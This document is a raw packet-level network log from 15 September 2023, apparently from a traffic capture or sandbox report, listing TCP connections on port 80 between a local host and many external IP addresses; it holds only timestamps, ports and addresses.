                                                                                                                                                                              Sep 15, 2023 07:26:20.786521912 CEST4978780192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:20.809184074 CEST4978880192.168.2.3172.67.140.52
                                                                                                                                                                              Sep 15, 2023 07:26:20.811891079 CEST4978980192.168.2.3192.124.249.20
                                                                                                                                                                              Sep 15, 2023 07:26:20.814445972 CEST4979080192.168.2.3172.67.208.67
                                                                                                                                                                              Sep 15, 2023 07:26:20.816725969 CEST4979180192.168.2.370.39.251.249
                                                                                                                                                                              Sep 15, 2023 07:26:20.817451000 CEST4979280192.168.2.3137.118.26.67
                                                                                                                                                                              Sep 15, 2023 07:26:20.822652102 CEST4979380192.168.2.318.119.154.66
                                                                                                                                                                              Sep 15, 2023 07:26:20.898646116 CEST4979480192.168.2.380.93.82.33
                                                                                                                                                                              Sep 15, 2023 07:26:20.900262117 CEST8049788172.67.140.52192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:20.900325060 CEST4978880192.168.2.3172.67.140.52
                                                                                                                                                                              Sep 15, 2023 07:26:20.900613070 CEST4978880192.168.2.3172.67.140.52
                                                                                                                                                                              Sep 15, 2023 07:26:20.905412912 CEST8049790172.67.208.67192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:20.905631065 CEST4979080192.168.2.3172.67.208.67
                                                                                                                                                                              Sep 15, 2023 07:26:20.905719042 CEST4979080192.168.2.3172.67.208.67
                                                                                                                                                                              Sep 15, 2023 07:26:20.908313036 CEST8049789192.124.249.20192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:20.908443928 CEST4978980192.168.2.3192.124.249.20
                                                                                                                                                                              Sep 15, 2023 07:26:20.908626080 CEST4978980192.168.2.3192.124.249.20
                                                                                                                                                                              Sep 15, 2023 07:26:20.912461996 CEST804979170.39.251.249192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:20.912547112 CEST4979180192.168.2.370.39.251.249
                                                                                                                                                                              Sep 15, 2023 07:26:20.912686110 CEST4979180192.168.2.370.39.251.249
                                                                                                                                                                              Sep 15, 2023 07:26:20.928605080 CEST804979318.119.154.66192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:20.928683043 CEST4979380192.168.2.318.119.154.66
                                                                                                                                                                              Sep 15, 2023 07:26:20.928950071 CEST4979380192.168.2.318.119.154.66
                                                                                                                                                                              Sep 15, 2023 07:26:20.991862059 CEST8049788172.67.140.52192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:20.996965885 CEST8049790172.67.208.67192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.004935980 CEST8049789192.124.249.20192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.005286932 CEST8049789192.124.249.20192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.005362034 CEST4978980192.168.2.3192.124.249.20
                                                                                                                                                                              Sep 15, 2023 07:26:21.007396936 CEST8049790172.67.208.67192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.007476091 CEST4979080192.168.2.3172.67.208.67
                                                                                                                                                                              Sep 15, 2023 07:26:21.008789062 CEST804979170.39.251.249192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.032785892 CEST804979170.39.251.249192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.032860994 CEST4979180192.168.2.370.39.251.249
                                                                                                                                                                              Sep 15, 2023 07:26:21.034451008 CEST804979318.119.154.66192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.034495115 CEST804979318.119.154.66192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.034507036 CEST4979380192.168.2.318.119.154.66
                                                                                                                                                                              Sep 15, 2023 07:26:21.034555912 CEST4979380192.168.2.318.119.154.66
                                                                                                                                                                              Sep 15, 2023 07:26:21.043490887 CEST8049762162.43.120.128192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.043603897 CEST4976280192.168.2.3162.43.120.128
                                                                                                                                                                              Sep 15, 2023 07:26:21.050110102 CEST8049787118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.050184965 CEST4978780192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:21.055387974 CEST4979380192.168.2.318.119.154.66
                                                                                                                                                                              Sep 15, 2023 07:26:21.067956924 CEST804979480.93.82.33192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.068023920 CEST4979480192.168.2.380.93.82.33
                                                                                                                                                                              Sep 15, 2023 07:26:21.104980946 CEST4979580192.168.2.359.106.19.204
                                                                                                                                                                              Sep 15, 2023 07:26:21.105102062 CEST4978780192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:21.105184078 CEST4978980192.168.2.3192.124.249.20
                                                                                                                                                                              Sep 15, 2023 07:26:21.105431080 CEST4979480192.168.2.380.93.82.33
                                                                                                                                                                              Sep 15, 2023 07:26:21.107001066 CEST4979680192.168.2.318.119.154.66
                                                                                                                                                                              Sep 15, 2023 07:26:21.107207060 CEST4979180192.168.2.370.39.251.249
                                                                                                                                                                              Sep 15, 2023 07:26:21.135845900 CEST8049759195.78.66.50192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.135935068 CEST4975980192.168.2.3195.78.66.50
                                                                                                                                                                              Sep 15, 2023 07:26:21.160934925 CEST804979318.119.154.66192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.202198982 CEST8049789192.124.249.20192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.202347040 CEST4978980192.168.2.3192.124.249.20
                                                                                                                                                                              Sep 15, 2023 07:26:21.203605890 CEST804979170.39.251.249192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.203670025 CEST4979180192.168.2.370.39.251.249
                                                                                                                                                                              Sep 15, 2023 07:26:21.212457895 CEST804979618.119.154.66192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.212671995 CEST4979680192.168.2.318.119.154.66
                                                                                                                                                                              Sep 15, 2023 07:26:21.217202902 CEST4979680192.168.2.318.119.154.66
                                                                                                                                                                              Sep 15, 2023 07:26:21.275196075 CEST804979480.93.82.33192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.275255919 CEST4979480192.168.2.380.93.82.33
                                                                                                                                                                              Sep 15, 2023 07:26:21.300709009 CEST4979780192.168.2.334.149.87.45
                                                                                                                                                                              Sep 15, 2023 07:26:21.302628040 CEST4979480192.168.2.380.93.82.33
                                                                                                                                                                              Sep 15, 2023 07:26:21.323122978 CEST804979618.119.154.66192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.323183060 CEST804979618.119.154.66192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.323209047 CEST4979680192.168.2.318.119.154.66
                                                                                                                                                                              Sep 15, 2023 07:26:21.323246002 CEST4979680192.168.2.318.119.154.66
                                                                                                                                                                              Sep 15, 2023 07:26:21.323694944 CEST4979680192.168.2.318.119.154.66
                                                                                                                                                                              Sep 15, 2023 07:26:21.368803024 CEST8049787118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.372942924 CEST804979559.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.373038054 CEST4979580192.168.2.359.106.19.204
                                                                                                                                                                              Sep 15, 2023 07:26:21.375149965 CEST8049787118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.375199080 CEST8049787118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.375240088 CEST8049787118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.375241995 CEST4978780192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:21.375264883 CEST4978780192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:21.375281096 CEST8049787118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.375296116 CEST4978780192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:21.375329018 CEST4978780192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:21.375365973 CEST8049787118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.375407934 CEST8049787118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.375415087 CEST4978780192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:21.375449896 CEST8049787118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.375452995 CEST4978780192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:21.375494957 CEST8049787118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.375509024 CEST4978780192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:21.375535011 CEST8049787118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.375547886 CEST4978780192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:21.375596046 CEST4978780192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:21.381803989 CEST4979580192.168.2.359.106.19.204
                                                                                                                                                                              Sep 15, 2023 07:26:21.395942926 CEST804979734.149.87.45192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.396024942 CEST4979780192.168.2.334.149.87.45
                                                                                                                                                                              Sep 15, 2023 07:26:21.396241903 CEST4979780192.168.2.334.149.87.45
                                                                                                                                                                              Sep 15, 2023 07:26:21.426621914 CEST4979880192.168.2.3104.26.7.221
                                                                                                                                                                              Sep 15, 2023 07:26:21.428699017 CEST804979618.119.154.66192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.472543955 CEST804979480.93.82.33192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.472681046 CEST4979480192.168.2.380.93.82.33
                                                                                                                                                                              Sep 15, 2023 07:26:21.489942074 CEST804979734.149.87.45192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.494257927 CEST4979980192.168.2.3142.251.41.51
                                                                                                                                                                              Sep 15, 2023 07:26:21.506098032 CEST804979734.149.87.45192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.506165981 CEST4979780192.168.2.334.149.87.45
                                                                                                                                                                              Sep 15, 2023 07:26:21.518908024 CEST8049798104.26.7.221192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.519108057 CEST4979880192.168.2.3104.26.7.221
                                                                                                                                                                              Sep 15, 2023 07:26:21.547339916 CEST4980080192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:21.547426939 CEST4979880192.168.2.3104.26.7.221
                                                                                                                                                                              Sep 15, 2023 07:26:21.604175091 CEST8049799142.251.41.51192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.604259014 CEST4979980192.168.2.3142.251.41.51
                                                                                                                                                                              Sep 15, 2023 07:26:21.607326031 CEST4979980192.168.2.3142.251.41.51
                                                                                                                                                                              Sep 15, 2023 07:26:21.637890100 CEST8049798104.26.7.221192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.638760090 CEST8049787118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.638817072 CEST8049787118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.638999939 CEST8049787118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.639003992 CEST4978780192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:21.639003992 CEST4978780192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:21.639086962 CEST8049787118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.639110088 CEST4978780192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:21.639141083 CEST4978780192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:21.639164925 CEST8049787118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.639228106 CEST4978780192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:21.639244080 CEST8049787118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.639302969 CEST4978780192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:21.639328957 CEST8049787118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.639384031 CEST4978780192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:21.639389038 CEST8049787118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.639405966 CEST8049787118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.639453888 CEST4978780192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:21.639453888 CEST4978780192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:21.641108036 CEST804979559.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.646787882 CEST8049798104.26.7.221192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.646851063 CEST4979880192.168.2.3104.26.7.221
                                                                                                                                                                              Sep 15, 2023 07:26:21.646881104 CEST8049798104.26.7.221192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.646934986 CEST4979880192.168.2.3104.26.7.221
                                                                                                                                                                              Sep 15, 2023 07:26:21.646939993 CEST8049798104.26.7.221192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.646974087 CEST8049798104.26.7.221192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.646989107 CEST8049798104.26.7.221192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.646995068 CEST4979880192.168.2.3104.26.7.221
                                                                                                                                                                              Sep 15, 2023 07:26:21.647018909 CEST4979880192.168.2.3104.26.7.221
                                                                                                                                                                              Sep 15, 2023 07:26:21.647037983 CEST4979880192.168.2.3104.26.7.221
                                                                                                                                                                              Sep 15, 2023 07:26:21.650173903 CEST804979559.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.650208950 CEST804979559.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.650234938 CEST4979580192.168.2.359.106.19.204
                                                                                                                                                                              Sep 15, 2023 07:26:21.650268078 CEST4979580192.168.2.359.106.19.204
                                                                                                                                                                              Sep 15, 2023 07:26:21.650293112 CEST804979559.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.650345087 CEST4979580192.168.2.359.106.19.204
                                                                                                                                                                              Sep 15, 2023 07:26:21.650373936 CEST804979559.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.650427103 CEST4979580192.168.2.359.106.19.204
                                                                                                                                                                              Sep 15, 2023 07:26:21.650432110 CEST804979559.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.650476933 CEST804979559.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.650485992 CEST4979580192.168.2.359.106.19.204
                                                                                                                                                                              Sep 15, 2023 07:26:21.650528908 CEST804979559.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.650530100 CEST4979580192.168.2.359.106.19.204
                                                                                                                                                                              Sep 15, 2023 07:26:21.650578022 CEST4979580192.168.2.359.106.19.204
                                                                                                                                                                              Sep 15, 2023 07:26:21.650583982 CEST804979559.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.650634050 CEST4979580192.168.2.359.106.19.204
                                                                                                                                                                              Sep 15, 2023 07:26:21.650636911 CEST804979559.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.650685072 CEST4979580192.168.2.359.106.19.204
                                                                                                                                                                              Sep 15, 2023 07:26:21.650719881 CEST804979559.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.650772095 CEST4979580192.168.2.359.106.19.204
                                                                                                                                                                              Sep 15, 2023 07:26:21.653140068 CEST80498003.140.13.188192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.653206110 CEST4980080192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:21.672360897 CEST4980080192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:21.717080116 CEST8049799142.251.41.51192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.774245024 CEST8049799142.251.41.51192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.774337053 CEST4979980192.168.2.3142.251.41.51
                                                                                                                                                                              Sep 15, 2023 07:26:21.778543949 CEST80498003.140.13.188192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.778585911 CEST80498003.140.13.188192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.778672934 CEST4980080192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:21.778672934 CEST4980080192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:21.792438984 CEST4980080192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:21.844696999 CEST4980180192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:21.844938040 CEST4980280192.168.2.362.122.190.121
                                                                                                                                                                              Sep 15, 2023 07:26:21.860409021 CEST4980380192.168.2.3185.15.129.58
                                                                                                                                                                              Sep 15, 2023 07:26:21.898042917 CEST80498003.140.13.188192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.919217110 CEST804979559.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.919280052 CEST804979559.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.919423103 CEST4979580192.168.2.359.106.19.204
                                                                                                                                                                              Sep 15, 2023 07:26:21.919423103 CEST4979580192.168.2.359.106.19.204
                                                                                                                                                                              Sep 15, 2023 07:26:21.951122046 CEST80498013.140.13.188192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:21.951251984 CEST4980180192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:21.955038071 CEST4980180192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:21.977611065 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:21.977665901 CEST4980580192.168.2.3172.67.152.159
                                                                                                                                                                              Sep 15, 2023 07:26:21.980226994 CEST4980680192.168.2.33.64.163.50
                                                                                                                                                                              Sep 15, 2023 07:26:22.032116890 CEST804980262.122.190.121192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:22.032258987 CEST4980280192.168.2.362.122.190.121
                                                                                                                                                                              Sep 15, 2023 07:26:22.032448053 CEST4980280192.168.2.362.122.190.121
                                                                                                                                                                              Sep 15, 2023 07:26:22.062222004 CEST80498013.140.13.188192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:22.062241077 CEST80498013.140.13.188192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:22.062352896 CEST4980180192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:22.062865973 CEST4980180192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:22.068128109 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:22.068141937 CEST8049805172.67.152.159192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:22.068214893 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:22.068236113 CEST4980580192.168.2.3172.67.152.159
                                                                                                                                                                              Sep 15, 2023 07:26:22.083597898 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:22.083630085 CEST4980580192.168.2.3172.67.152.159
                                                                                                                                                                              Sep 15, 2023 07:26:22.154158115 CEST80498063.64.163.50192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:22.154365063 CEST4980680192.168.2.33.64.163.50
                                                                                                                                                                              Sep 15, 2023 07:26:22.154509068 CEST4980680192.168.2.33.64.163.50
                                                                                                                                                                              Sep 15, 2023 07:26:22.168257952 CEST80498013.140.13.188192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:22.173860073 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:22.173873901 CEST8049805172.67.152.159192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:22.219230890 CEST804980262.122.190.121192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:22.220257044 CEST804980262.122.190.121192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:22.220411062 CEST4980280192.168.2.362.122.190.121
                                                                                                                                                                              Sep 15, 2023 07:26:22.247406960 CEST4980780192.168.2.3185.80.51.179
                                                                                                                                                                              Sep 15, 2023 07:26:22.247905970 CEST4980280192.168.2.362.122.190.121
                                                                                                                                                                              Sep 15, 2023 07:26:22.265132904 CEST4980880192.168.2.389.161.163.246
                                                                                                                                                                              Sep 15, 2023 07:26:22.328264952 CEST80498063.64.163.50192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:22.328337908 CEST80498063.64.163.50192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:22.328401089 CEST4980680192.168.2.33.64.163.50
                                                                                                                                                                              Sep 15, 2023 07:26:22.435940981 CEST804980262.122.190.121192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:22.436002016 CEST4980280192.168.2.362.122.190.121
                                                                                                                                                                              Sep 15, 2023 07:26:22.437453032 CEST8049807185.80.51.179192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:22.437529087 CEST4980780192.168.2.3185.80.51.179
                                                                                                                                                                              Sep 15, 2023 07:26:22.460056067 CEST4977980192.168.2.3198.100.146.220
                                                                                                                                                                              Sep 15, 2023 07:26:22.462806940 CEST4980780192.168.2.3185.80.51.179
                                                                                                                                                                              Sep 15, 2023 07:26:22.465833902 CEST804980889.161.163.246192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:22.465905905 CEST4980880192.168.2.389.161.163.246
                                                                                                                                                                              Sep 15, 2023 07:26:22.478005886 CEST4980880192.168.2.389.161.163.246
                                                                                                                                                                              Sep 15, 2023 07:26:22.492933035 CEST4980980192.168.2.3192.124.249.10
                                                                                                                                                                              Sep 15, 2023 07:26:22.589258909 CEST8049809192.124.249.10192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:22.589466095 CEST4980980192.168.2.3192.124.249.10
                                                                                                                                                                              Sep 15, 2023 07:26:22.589915991 CEST4980980192.168.2.3192.124.249.10
                                                                                                                                                                              Sep 15, 2023 07:26:22.653167963 CEST8049807185.80.51.179192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:22.654155016 CEST8049807185.80.51.179192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:22.654228926 CEST4980780192.168.2.3185.80.51.179
                                                                                                                                                                              Sep 15, 2023 07:26:22.669914007 CEST8049805172.67.152.159192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:22.669939041 CEST8049805172.67.152.159192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:22.669950962 CEST8049805172.67.152.159192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:22.669981956 CEST4980580192.168.2.3172.67.152.159
                                                                                                                                                                              Sep 15, 2023 07:26:22.670020103 CEST4980580192.168.2.3172.67.152.159
                                                                                                                                                                              Sep 15, 2023 07:26:22.678868055 CEST804980889.161.163.246192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:22.679301023 CEST804980889.161.163.246192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:22.679373026 CEST4980880192.168.2.389.161.163.246
                                                                                                                                                                              Sep 15, 2023 07:26:22.679394960 CEST804980889.161.163.246192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:22.679450035 CEST4980880192.168.2.389.161.163.246
                                                                                                                                                                              Sep 15, 2023 07:26:22.686074972 CEST8049809192.124.249.10192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:22.686497927 CEST8049809192.124.249.10192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:22.686566114 CEST4980980192.168.2.3192.124.249.10
                                                                                                                                                                              Sep 15, 2023 07:26:22.786072016 CEST4980980192.168.2.3192.124.249.10
                                                                                                                                                                              Sep 15, 2023 07:26:22.882502079 CEST4981080192.168.2.380.74.154.6
                                                                                                                                                                              Sep 15, 2023 07:26:22.882894039 CEST8049809192.124.249.10192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:22.882972956 CEST4980980192.168.2.3192.124.249.10
                                                                                                                                                                              Sep 15, 2023 07:26:22.926454067 CEST4981180192.168.2.3192.252.154.18
                                                                                                                                                                              Sep 15, 2023 07:26:22.937423944 CEST4981280192.168.2.346.242.238.60
                                                                                                                                                                              Sep 15, 2023 07:26:22.968501091 CEST8049739170.82.174.30192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:22.968571901 CEST4973980192.168.2.3170.82.174.30
                                                                                                                                                                              Sep 15, 2023 07:26:23.022811890 CEST8049811192.252.154.18192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.022927999 CEST4981180192.168.2.3192.252.154.18
                                                                                                                                                                              Sep 15, 2023 07:26:23.023300886 CEST4981180192.168.2.3192.252.154.18
                                                                                                                                                                              Sep 15, 2023 07:26:23.064266920 CEST804981080.74.154.6192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.064352989 CEST4981080192.168.2.380.74.154.6
                                                                                                                                                                              Sep 15, 2023 07:26:23.064727068 CEST4981080192.168.2.380.74.154.6
                                                                                                                                                                              Sep 15, 2023 07:26:23.066135883 CEST4981380192.168.2.360.43.154.138
                                                                                                                                                                              Sep 15, 2023 07:26:23.119529009 CEST8049811192.252.154.18192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.121551991 CEST8049811192.252.154.18192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.121639967 CEST4981180192.168.2.3192.252.154.18
                                                                                                                                                                              Sep 15, 2023 07:26:23.138148069 CEST804981246.242.238.60192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.138222933 CEST4981280192.168.2.346.242.238.60
                                                                                                                                                                              Sep 15, 2023 07:26:23.152398109 CEST4981280192.168.2.346.242.238.60
                                                                                                                                                                              Sep 15, 2023 07:26:23.172472000 CEST4981480192.168.2.3188.165.133.163
                                                                                                                                                                              Sep 15, 2023 07:26:23.246639967 CEST804981080.74.154.6192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.246692896 CEST804981080.74.154.6192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.246771097 CEST4981080192.168.2.380.74.154.6
                                                                                                                                                                              Sep 15, 2023 07:26:23.268870115 CEST4981080192.168.2.380.74.154.6
                                                                                                                                                                              Sep 15, 2023 07:26:23.319900036 CEST804981360.43.154.138192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.320059061 CEST4981380192.168.2.360.43.154.138
                                                                                                                                                                              Sep 15, 2023 07:26:23.320652008 CEST4981380192.168.2.360.43.154.138
                                                                                                                                                                              Sep 15, 2023 07:26:23.322365046 CEST4981580192.168.2.3193.166.255.171
                                                                                                                                                                              Sep 15, 2023 07:26:23.347851038 CEST8049814188.165.133.163192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.347959042 CEST4981480192.168.2.3188.165.133.163
                                                                                                                                                                              Sep 15, 2023 07:26:23.348316908 CEST4981480192.168.2.3188.165.133.163
                                                                                                                                                                              Sep 15, 2023 07:26:23.353346109 CEST804981246.242.238.60192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.354319096 CEST804981246.242.238.60192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.354379892 CEST4981280192.168.2.346.242.238.60
                                                                                                                                                                              Sep 15, 2023 07:26:23.450977087 CEST804981080.74.154.6192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.451081991 CEST4981080192.168.2.380.74.154.6
                                                                                                                                                                              Sep 15, 2023 07:26:23.523490906 CEST8049814188.165.133.163192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.523595095 CEST8049814188.165.133.163192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.523653984 CEST4981480192.168.2.3188.165.133.163
                                                                                                                                                                              Sep 15, 2023 07:26:23.546137094 CEST4981480192.168.2.3188.165.133.163
                                                                                                                                                                              Sep 15, 2023 07:26:23.574302912 CEST804981360.43.154.138192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.575110912 CEST804981360.43.154.138192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.575293064 CEST4981380192.168.2.360.43.154.138
                                                                                                                                                                              Sep 15, 2023 07:26:23.592370033 CEST4981380192.168.2.360.43.154.138
                                                                                                                                                                              Sep 15, 2023 07:26:23.724980116 CEST8049814188.165.133.163192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.725080013 CEST4981480192.168.2.3188.165.133.163
                                                                                                                                                                              Sep 15, 2023 07:26:23.775743961 CEST4981680192.168.2.3202.254.236.40
                                                                                                                                                                              Sep 15, 2023 07:26:23.819462061 CEST4979280192.168.2.3137.118.26.67
